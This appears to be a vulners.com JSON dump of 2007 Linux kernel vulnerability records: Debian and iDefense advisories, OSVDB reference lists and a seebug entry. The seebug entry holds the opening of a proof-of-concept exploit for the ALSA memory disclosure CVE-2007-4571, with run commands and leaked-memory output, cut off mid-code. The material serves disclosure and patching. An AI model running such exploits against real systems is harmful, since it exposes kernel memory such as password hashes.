http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-sparc64-smp_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 10610496 b40bc9a07de220a54a1489b22d1d60f4\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-5-vserver-sparc64_2.6.18.dfsg.1-13etch1_sparc.deb\r\n Size/MD5 checksum: 10656362 91c6c66c24c7d5ca45c0e6eb5dcdcbba\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ etch/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/etch/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (GNU/Linux)\r\n\r\niD8DBQFGw6BUhuANDBmkLRkRAoORAJ9xahJqDWTm6CV7/bRjmcFCfPYJuACcDG5b\r\n2aO+KPMNmsXmfH9W/1fMQtM=\r\n=L22s\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2007-08-17T00:00:00", "published": "2007-08-17T00:00:00", "id": "SECURITYVULNS:DOC:17828", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17828", "title": "[SECURITY] [DSA 1356-1] New Linux 2.6.18 packages fix several vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "cvelist": ["CVE-2007-4571"], "description": "Linux Kernel ALSA snd_mem_proc_read Information Disclosure Vulnerability\r\n\r\niDefense Security Advisory 09.25.07\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nSep 25, 2007\r\n\r\nI. BACKGROUND\r\n\r\nLinux is a clone of the UNIX operating system, written from scratch by\r\nLinus Torvalds with assistance from a loosely-knit team of hackers\r\nacross the Internet. The Advanced Linux Sound Architecture (ALSA)\r\nproject provides audio device support for Linux systems. More\r\ninformation can be found at the URLs shown below.\r\n\r\nhttp://kernel.org/\r\n\r\nhttp://www.alsa-project.org/main/index.php/Main_Page\r\n\r\nII. DESCRIPTION\r\n\r\nLocal exploitation of an information disclosure vulnerability within the\r\nALSA driver included in the Linux Kernel allows attackers to obtain\r\nsensitive information from kernel memory.\r\n\r\nThe problem lies within the handling of multiple reads from the\r\n"/proc/driver/snd-page-alloc" file. The kernel side function that\r\nhandles the read system call, "snd_mem_proc_read", is defined in\r\nsound/core/memalloc.c as shown below.\r\n\r\n 484 static int snd_mem_proc_read(char *page, char **start, off_t off,\r\n 485 int count, int *eof, void *data)\r\n 486 {\r\n 487 int len = 0;\r\n ...\r\n 494 len += snprintf(page + len, count - len,\r\n 495 "pages : %li bytes (%li pages per %likB)\n",\r\n 496 pages * PAGE_SIZE, pages, PAGE_SIZE / 1024);\r\n ...\r\n 508 return len;\r\n 509 }\r\n\r\nOn line 494, snprintf is called to generate the output for the proc file\r\nsystem entry. By supplying a count value of 1, snprintf will only write\r\na single byte to the destination buffer. However, the function will\r\nreturn the number of bytes that would have been written if enough space\r\nwere available. The "*eof" value is never set, and the "*ppos" value is\r\nnever used.\r\n\r\nThis function is called from "proc_file_read" function, which is defined\r\nin fs/proc/generic.c.\r\n\r\n 51 static ssize_t\r\n 52 proc_file_read(struct file *file, char __user *buf, size_t nbytes,\r\n 53 loff_t *ppos)\r\n 54 {\r\n ...\r\n 136 n = dp->read_proc(page, &start, *ppos,\r\n 137 count, &eof, dp->data);\r\n ...\r\n 155 n -= *ppos;\r\n 156 if (n <= 0)\r\n 157 break;\r\n 158 if (n > count)\r\n 159 n = count;\r\n 160 start = page + *ppos;\r\n ...\r\n 186 n -= copy_to_user(buf, start < page ? page :\r\nstart, n);\r\n ...\r\n 193 *ppos += start < page ? (unsigned long)start : n;\r\n\r\nThe value "n" is returned from the call to the snd_proc_mem_read\r\nfunction on line 136. Since the value returned, approximately 41 in\r\nsingle device scenarios, is greater than the requested read size (1),\r\nthe value "n" is set to "count" on line 158. Later, "*ppos" is\r\nincremented and "n" bytes are copied to user-land from "start" (which\r\nis calculated as "page" + *ppos).\r\n\r\nIn subsequent user-land read operations, when "*ppos" is greater than\r\nzero, the proc_file_read function will copy from beyond the part of the\r\npage that snd_mem_proc_read wrote. This results in the disclosure of\r\nkernel memory.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability allows attackers to obtain sensitive\r\ninformation from kernel memory.\r\n\r\nIn order to exploit this vulnerability, an attacker would need access to\r\nopen the /proc/driver/snd-page-alloc file. It is important to note that\r\nthis file does not exist unless an audio device is present.\r\n\r\nAdditionally, the Linux kernel must be built with ALSA support as well\r\nas support for the proc file system. The kernels for the majority of\r\ncommon Linux distributions are built with these options.\r\n\r\nSince memory is only disclosed from the beginning of an uninitialized\r\npage, it may not be possible to obtain certain types of information.\r\nHowever, the ability to obtain the password hash for the root account\r\nwas confirmed during iDefense Labs testing.\r\n\r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of this vulnerability in version\r\n2.6.22.1 of the Linux Kernel as installed with Fedora CORE 7. It is\r\nsuspected that other versions are also vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\nThe following workarounds will prevent exploitation of this\r\nvulnerability.\r\n\r\n * If the ALSA drivers have been built as modules, unload the\r\nsnd_page_alloc module.\r\n * Restrict access to the /proc file system by modifying the mount\r\nparameters within /etc/fstab\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nThe Linux Kernel maintainers have addressed this vulnerability within\r\nversion 2.6.22.8. More information can be found from the URLs shown\r\nbelow.\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=ccec6e2c4a74adf76ed4e2478091a311b1806212\r\n\r\nhttp://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.22.8\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2007-4571 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n09/12/2007 Initial vendor notification\r\n09/12/2007 Initial vendor response\r\n09/25/2007 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was reported to iDefense by Neil Kettle (mu-b) of\r\nwww.digit-labs.org.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2007 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "edition": 1, "modified": "2007-09-26T00:00:00", "published": "2007-09-26T00:00:00", "id": "SECURITYVULNS:DOC:18082", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18082", "title": "iDefense Security Advisory 09.25.07: Linux Kernel ALSA snd_mem_proc_read Information Disclosure Vulnerability", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:27", "bulletinFamily": "software", "cvelist": ["CVE-2007-4573"], "description": "Insufficient registry access validation on 32-bit syscalls emulation.", "edition": 1, "modified": "2007-09-25T00:00:00", "published": "2007-09-25T00:00:00", "id": "SECURITYVULNS:VULN:8184", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8184", "title": "64-bit Linux kernel privilege escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "cvelist": ["CVE-2007-2876", "CVE-2007-3380", "CVE-2007-3513", "CVE-2007-2875", "CVE-2007-2878", "CVE-2007-2525"], "description": "DoS with cluster manager, DoS with usblcd driver, DoS with VFAT IOCTL.", "edition": 1, "modified": "2007-07-19T00:00:00", "published": "2007-07-19T00:00:00", "id": "SECURITYVULNS:VULN:7954", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7954", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "cvelist": ["CVE-2007-4571"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.22.8</a>\nVendor Specific News/Changelog Entry: https://issues.rpath.com/browse/RPL-1761</a>\nVendor Specific News/Changelog Entry: http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=ccec6e2c4a74adf76ed4e2478091a311b1806212</a>\nVendor Specific News/Changelog Entry: http://support.avaya.com/elmodocs2/security/ASA-2007-474.htm</a>\nSecurity Tracker: 1018734\n[Secunia Advisory ID:26918](https://secuniaresearch.flexerasoftware.com/advisories/26918/)\n[Secunia Advisory ID:26989](https://secuniaresearch.flexerasoftware.com/advisories/26989/)\n[Secunia Advisory ID:27101](https://secuniaresearch.flexerasoftware.com/advisories/27101/)\n[Secunia Advisory ID:27436](https://secuniaresearch.flexerasoftware.com/advisories/27436/)\n[Secunia Advisory ID:26980](https://secuniaresearch.flexerasoftware.com/advisories/26980/)\n[Secunia Advisory ID:27227](https://secuniaresearch.flexerasoftware.com/advisories/27227/)\n[Secunia Advisory ID:27824](https://secuniaresearch.flexerasoftware.com/advisories/27824/)\n[Secunia Advisory ID:27747](https://secuniaresearch.flexerasoftware.com/advisories/27747/)\nRedHat RHSA: RHSA-2007:0993\nRedHat RHSA: RHSA-2007:0939\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00436.html\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-10/msg00000.html\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-September/000253.html\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-October/msg00083.html\nOther Advisory URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=600\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2007_53_kernel.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-09/0335.html\nISS X-Force ID: 36780\nFrSIRT Advisory: ADV-2007-3272\n[CVE-2007-4571](https://vulners.com/cve/CVE-2007-4571)\nBugtraq ID: 25807\n", "edition": 1, "modified": "2007-09-25T12:21:50", "published": "2007-09-25T12:21:50", "href": "https://vulners.com/osvdb/OSVDB:39234", "id": "OSVDB:39234", "title": "Linux Kernel ALSA sound/core/memalloc.c snd_mem_proc_read() Function Arbitrary Kernel Memory Disclosure", "type": "osvdb", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4573"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://lkml.org/lkml/2007/9/21/513\nVendor Specific News/Changelog Entry: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.22.7\nVendor Specific News/Changelog Entry: http://lkml.org/lkml/2007/9/21/512\nSecurity Tracker: 1018748\n[Secunia Advisory ID:26953](https://secuniaresearch.flexerasoftware.com/advisories/26953/)\n[Secunia Advisory ID:26917](https://secuniaresearch.flexerasoftware.com/advisories/26917/)\n[Secunia Advisory ID:26978](https://secuniaresearch.flexerasoftware.com/advisories/26978/)\n[Secunia Advisory ID:26994](https://secuniaresearch.flexerasoftware.com/advisories/26994/)\n[Secunia Advisory ID:27212](https://secuniaresearch.flexerasoftware.com/advisories/27212/)\n[Secunia Advisory ID:27912](https://secuniaresearch.flexerasoftware.com/advisories/27912/)\n[Secunia Advisory ID:26995](https://secuniaresearch.flexerasoftware.com/advisories/26995/)\n[Secunia Advisory ID:26919](https://secuniaresearch.flexerasoftware.com/advisories/26919/)\n[Secunia Advisory ID:26955](https://secuniaresearch.flexerasoftware.com/advisories/26955/)\n[Secunia Advisory ID:26934](https://secuniaresearch.flexerasoftware.com/advisories/26934/)\n[Secunia Advisory ID:27227](https://secuniaresearch.flexerasoftware.com/advisories/27227/)\nRedHat RHSA: RHSA-2007:0936\nOther Advisory URL: http://kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.35.3\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00355.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-518-1\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1378\nOther Advisory URL: http://www.debian.org/security/2007/dsa-1381\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-10/msg00000.html\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-12/msg00001.html\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00375.html\nOther Advisory URL: http://lists.grok.org.uk/pipermail/full-disclosure/2007-October/066702.html\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-September/000251.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-09/0479.html\nKeyword: COSEINC Linux Advisory #2\nFrSIRT Advisory: ADV-2007-3246\n[CVE-2007-4573](https://vulners.com/cve/CVE-2007-4573)\nBugtraq ID: 25774\n", "edition": 1, "modified": "2007-09-24T14:21:12", "published": "2007-09-24T14:21:12", "href": "https://vulners.com/osvdb/OSVDB:37287", "id": "OSVDB:37287", "title": "Linux Kernel on x86_64 IA32 System Call Emulation %RAX Register Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-2876"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.21.4\n[Secunia Advisory ID:26133](https://secuniaresearch.flexerasoftware.com/advisories/26133/)\n[Secunia Advisory ID:26450](https://secuniaresearch.flexerasoftware.com/advisories/26450/)\n[Secunia Advisory ID:26760](https://secuniaresearch.flexerasoftware.com/advisories/26760/)\n[Secunia Advisory ID:25961](https://secuniaresearch.flexerasoftware.com/advisories/25961/)\n[Secunia Advisory ID:26620](https://secuniaresearch.flexerasoftware.com/advisories/26620/)\n[Secunia Advisory ID:25594](https://secuniaresearch.flexerasoftware.com/advisories/25594/)\n[Secunia Advisory ID:26139](https://secuniaresearch.flexerasoftware.com/advisories/26139/)\n[Secunia Advisory ID:26289](https://secuniaresearch.flexerasoftware.com/advisories/26289/)\n[Secunia Advisory ID:25838](https://secuniaresearch.flexerasoftware.com/advisories/25838/)\n[Secunia Advisory ID:26664](https://secuniaresearch.flexerasoftware.com/advisories/26664/)\n[Secunia Advisory ID:27227](https://secuniaresearch.flexerasoftware.com/advisories/27227/)\n[Related OSVDB ID: 37109](https://vulners.com/osvdb/OSVDB:37109)\n[Related OSVDB ID: 37114](https://vulners.com/osvdb/OSVDB:37114)\n[Related OSVDB ID: 37113](https://vulners.com/osvdb/OSVDB:37113)\nRedHat RHSA: RHSA-2007:0705\nRedHat RHSA: RHSA-2007:0488\nOther Advisory URL: http://www.ubuntu.com/usn/usn-486-1\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-07/msg00005.html\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:171\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1356\nOther Advisory URL: http://support.novell.com/techcenter/psdb/a4e6d19f94707022b621550d1049f74e.html\nOther Advisory URL: http://www.redhat.com/support/errata/RHSA-2007-0705.html\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-10/msg00000.html\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-287.htm\nOther Advisory URL: http://www.debian.org/security/2007/dsa-1356\nOther Advisory URL: http://frontal2.mandriva.com/security/advisories?name=MDKSA-2007:171\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2007_43_kernel.html\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2007_51_kernel.html\nOther Advisory URL: http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.21.4\nOther Advisory URL: http://www.ubuntu.com/usn/usn-489-1\nOther Advisory URL: http://www.ubuntu.com/usn/usn-510-1\nMail List Post: http://marc.info/?l=linux-kernel&m=118128622431272&w=2\nMail List Post: http://marc.info/?l=linux-kernel&m=118128610219959&w=2\nISS X-Force ID: 34777\nFrSIRT Advisory: ADV-2007-2105\n[CVE-2007-2876](https://vulners.com/cve/CVE-2007-2876)\nBugtraq ID: 24376\n", "edition": 1, "modified": "2007-06-08T13:18:47", "published": "2007-06-08T13:18:47", "href": "https://vulners.com/osvdb/OSVDB:37112", "id": "OSVDB:37112", "title": "Linux Kernel Netfilter *_conntrack_proto_sctp.c sctp_new Function Remote DoS", "type": "osvdb", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-3105"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://www.kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.22-git14.log\n[Secunia Advisory ID:26500](https://secuniaresearch.flexerasoftware.com/advisories/26500/)\n[Secunia Advisory ID:26647](https://secuniaresearch.flexerasoftware.com/advisories/26647/)\n[Secunia Advisory ID:26643](https://secuniaresearch.flexerasoftware.com/advisories/26643/)\n[Secunia Advisory ID:27212](https://secuniaresearch.flexerasoftware.com/advisories/27212/)\n[Secunia Advisory ID:27436](https://secuniaresearch.flexerasoftware.com/advisories/27436/)\n[Secunia Advisory ID:27322](https://secuniaresearch.flexerasoftware.com/advisories/27322/)\n[Secunia Advisory ID:26651](https://secuniaresearch.flexerasoftware.com/advisories/26651/)\n[Secunia Advisory ID:26664](https://secuniaresearch.flexerasoftware.com/advisories/26664/)\n[Secunia Advisory ID:27227](https://secuniaresearch.flexerasoftware.com/advisories/27227/)\nRedHat RHSA: RHSA-2007:0940\nRedHat RHSA: RHSA-2007:0939\nOther Advisory URL: http://support.novell.com/techcenter/psdb/a4e6d19f94707022b621550d1049f74e.html\nOther Advisory URL: http://www.debian.org/security/2007/dsa-1363\nOther Advisory URL: http://www.ubuntu.com/usn/usn-508-1\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-10/msg00000.html\nOther Advisory URL: https://issues.rpath.com/browse/RPL-1650\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2007_51_kernel.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-509-1\nOther Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00125.html\nOther Advisory URL: http://lists.grok.org.uk/pipermail/full-disclosure/2007-October/066702.html\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-August/000227.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-510-1\n[CVE-2007-3105](https://vulners.com/cve/CVE-2007-3105)\nBugtraq ID: 25348\n", "edition": 1, "modified": "2007-07-19T19:18:46", "published": "2007-07-19T19:18:46", "href": "https://vulners.com/osvdb/OSVDB:37288", "id": "OSVDB:37288", "title": "Linux Kernel RNG Default Wakeup Threshold Manipulation Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-3848"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=CVE-2007-3848\nVendor Specific News/Changelog Entry: http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.22.4\n[Secunia Advisory ID:26450](https://secuniaresearch.flexerasoftware.com/advisories/26450/)\n[Secunia Advisory ID:26500](https://secuniaresearch.flexerasoftware.com/advisories/26500/)\n[Secunia Advisory ID:26643](https://secuniaresearch.flexerasoftware.com/advisories/26643/)\n[Secunia Advisory ID:27212](https://secuniaresearch.flexerasoftware.com/advisories/27212/)\n[Secunia Advisory ID:27436](https://secuniaresearch.flexerasoftware.com/advisories/27436/)\n[Secunia Advisory ID:27322](https://secuniaresearch.flexerasoftware.com/advisories/27322/)\n[Secunia Advisory ID:26651](https://secuniaresearch.flexerasoftware.com/advisories/26651/)\n[Secunia Advisory ID:26664](https://secuniaresearch.flexerasoftware.com/advisories/26664/)\n[Secunia Advisory ID:27227](https://secuniaresearch.flexerasoftware.com/advisories/27227/)\n[Secunia Advisory ID:27913](https://secuniaresearch.flexerasoftware.com/advisories/27913/)\nRedHat RHSA: RHSA-2007:0940\nRedHat RHSA: RHSA-2007:0939\nRedHat RHSA: RHSA-2007:1049\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1356\nOther Advisory URL: https://issues.rpath.com/browse/RPL-1648\nOther Advisory URL: http://support.novell.com/techcenter/psdb/a4e6d19f94707022b621550d1049f74e.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-508-1\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-10/msg00000.html\nOther Advisory URL: http://www.debian.org/security/2007/dsa-1356\nOther Advisory URL: http://www.ubuntu.com/usn/usn-509-1\nOther Advisory URL: http://lists.grok.org.uk/pipermail/full-disclosure/2007-October/066702.html\nOther Advisory URL: http://lists.rpath.com/pipermail/security-announce/2007-August/000227.html\nOther Advisory URL: http://www.ubuntu.com/usn/usn-510-1\nMail List Post: http://marc.info/?l=openwall-announce&m=118710356812637&w=2\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-08/0197.html\nKeyword: COSEINC Linux Advisory #1\n[CVE-2007-3848](https://vulners.com/cve/CVE-2007-3848)\nBugtraq ID: 25387\n", "edition": 1, "modified": "2007-08-14T19:16:46", "published": "2007-08-14T19:16:46", "href": "https://vulners.com/osvdb/OSVDB:37289", "id": "OSVDB:37289", "title": "Linux Kernel PR_SET_PDEATHSIG Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-2525"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kernel.org/pub/linux/kernel/v2.6/snapshots/patch-2.6.21-git8.log\n[Secunia Advisory ID:26133](https://secuniaresearch.flexerasoftware.com/advisories/26133/)\n[Secunia Advisory ID:26450](https://secuniaresearch.flexerasoftware.com/advisories/26450/)\n[Secunia Advisory ID:25700](https://secuniaresearch.flexerasoftware.com/advisories/25700/)\n[Secunia Advisory ID:26620](https://secuniaresearch.flexerasoftware.com/advisories/26620/)\n[Secunia Advisory ID:25163](https://secuniaresearch.flexerasoftware.com/advisories/25163/)\n[Secunia Advisory ID:26289](https://secuniaresearch.flexerasoftware.com/advisories/26289/)\n[Secunia Advisory ID:26139](https://secuniaresearch.flexerasoftware.com/advisories/26139/)\n[Secunia Advisory ID:25838](https://secuniaresearch.flexerasoftware.com/advisories/25838/)\n[Secunia Advisory ID:26664](https://secuniaresearch.flexerasoftware.com/advisories/26664/)\n[Secunia Advisory ID:27227](https://secuniaresearch.flexerasoftware.com/advisories/27227/)\nRedHat RHSA: RHSA-2007:0376\nRedHat RHSA: RHSA-2007:0488\nOther Advisory URL: http://www.ubuntu.com/usn/usn-486-1\nOther Advisory URL: http://www.mandriva.com/security/advisories?name=MDKSA-2007:171\nOther Advisory URL: http://www.us.debian.org/security/2007/dsa-1356\nOther Advisory URL: http://support.novell.com/techcenter/psdb/a4e6d19f94707022b621550d1049f74e.html\nOther Advisory URL: http://lists.opensuse.org/opensuse-security-announce/2007-10/msg00000.html\nOther Advisory URL: http://support.avaya.com/elmodocs2/security/ASA-2007-287.htm\nOther Advisory URL: http://www.ubuntu.com/usn/usn-489-1\nISS X-Force ID: 34150\nFrSIRT Advisory: ADV-2007-1703\n[CVE-2007-2525](https://vulners.com/cve/CVE-2007-2525)\nBugtraq ID: 23870\n", "edition": 1, "modified": "2007-04-20T06:56:04", "published": "2007-04-20T06:56:04", "href": "https://vulners.com/osvdb/OSVDB:35929", "id": "OSVDB:35929", "title": "Linux Kernel PPPoE Socket PPPIOCGCHAN Memory Leak Local DoS", "type": "osvdb", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T13:37:05", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Linux Kernel 2.6.x ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4571"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-83980", "id": "SSV:83980", "sourceData": "\n source: http://www.securityfocus.com/bid/25774/info\r\n \r\nThe Linux kernel is prone to a local privilege-escalation vulnerability.\r\n \r\nExploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.\r\n \r\nVersions of Linux kernel prior to 2.4.35.3 and 2.6.22.7 are vulnerable to this issue. \r\n \r\n/*\r\n *****************************************************************************************\r\n * by Karimo_DM under GPL *\r\n * *\r\n * Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability *\r\n * CVE-2007-4571 *\r\n * *\r\n * This simple PoF demonstrate how snd_page_alloc.c prior to Linux Kernel version * \r\n * 2.6.22.8 (2.6.23-rc8) fails to boundary check a buffer in case of count=1 showing *\r\n * parts of kernel memory (reaveling randomly some risky informations). \t *\r\n * *\r\n * karimo@localhost:~/src/c/bugs$ gcc -O2 cve20074571_alsa.c -ocve20074571_alsa *\r\n * karimo@localhost:~/src/c/bugs$ ./cve20074571_alsa | hexdump -C *\r\n * 00000000 00 03 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 |..UU'....P...P..| *\r\n * 00000010 4f 53 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e |OSF00010020//.AN| *\r\n * 00000020 53 49 5f 58 33 2e 34 2d 31 39 00 03 55 55 27 00 |SI_X3.4-19..UU'.| *\r\n * 00000030 00 00 10 50 12 08 1e 50 12 08 4f 53 46 30 30 30 |...P...P..OSF000| *\r\n * 00000040 31 30 30 32 30 2f 2f 00 41 4e 53 49 5f 58 33 2e |10020//.ANSI_X3.| *\r\n * 00000050 34 2d 31 39 00 03 55 55 27 00 00 00 10 50 12 08 |4-19..UU'....P..| *\r\n * 00000060 1e 50 12 08 4f 53 46 30 30 30 31 30 30 32 30 2f |.P..OSF00010020/| *\r\n * 00000070 2f 00 41 4e 53 49 5f 58 33 2e 34 2d 31 39 00 03 |/.ANSI_X3.4-19..| *\r\n * 00000080 55 55 27 00 00 00 10 50 12 08 1e 50 12 08 4f 53 |UU'....P...P..OS| *\r\n * 00000090 46 30 30 30 31 30 30 32 30 2f 2f 00 41 4e 53 49 |F00010020//.ANSI| *\r\n * ... *\r\n * 000051d0 00 02 20 00 78 ce ed da c0 43 93 c4 01 80 00 4d |.. .x\ufffd\ufffd\ufffd\ufffdC.\ufffd...M| *\r\n * 000051e0 71 88 9d 3c 04 27 0d 5d 80 ec 19 2f 12 8a 42 9d |q..<.'.].\ufffd./..B.| *\r\n * 000051f0 80 2e 9f c7 89 2c 87 ca 97 dd 50 8a e3 fa c3 15 |...\ufffd.,.\ufffd.\ufffdP.\ufffd\ufffd\ufffd.| *\r\n * 00005200 a2 3e 37 49 93 c4 01 80 00 4d 71 88 9d 3c 04 27 |\ufffd>7I.\ufffd...Mq..<.'| *\r\n * 00005210 0d 5d 80 ec 19 2f 12 8a 42 9d 80 2e 9f c7 89 2c |.].\ufffd./..B....\ufffd.,| *\r\n * 00005220 87 ca 97 dd 50 8a e3 fa c3 15 a2 3e 37 49 93 c4 |.\ufffd.\ufffdP.\ufffd\ufffd\ufffd.\ufffd>7I.\ufffd| *\r\n * ... *\r\n * *\r\n * *\r\n * [ Tested on a Slackware 12.0 running a self-compiled 2.6.21.3 Linux Kernel ] *\r\n *****************************************************************************************\r\n */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n \r\n#define _SOME_NUM 0xffff\r\n \r\nint main() {\r\n unsigned int j;\r\n char kern_mem[2];\r\n int 